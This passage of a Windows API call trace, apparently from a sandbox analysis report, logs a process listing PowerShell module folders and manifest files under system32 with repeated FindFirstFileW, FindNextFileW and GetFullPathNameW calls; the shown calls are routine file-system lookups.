lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x1b81e490 | out: lpFileInformation=0x1b81e490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e370) returned 1 [0264.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3e0) returned 1 [0264.918] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b81ded0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0264.918] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0264.918] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b81e080 | out: lpFindFileData=0x1b81e080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.919] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.919] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0264.920] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0264.920] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e330) returned 1 [0264.921] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.921] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.921] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.921] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0264.921] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0264.922] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0264.922] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.922] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0264.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.922] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0264.922] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54 [0264.922] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.923] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.923] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0264.923] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0264.923] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.924] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0264.924] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54 [0264.924] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.924] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.924] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0264.924] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.924] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.925] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0264.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.925] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.925] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0264.925] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54 [0264.925] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.925] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.926] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0264.926] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0264.926] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.926] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0264.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.926] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0264.926] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d [0264.927] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.927] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.927] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0264.927] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0264.927] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.928] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0264.928] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d [0264.928] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.928] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.928] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0264.928] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.929] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.929] GetFullPathNameW (in: 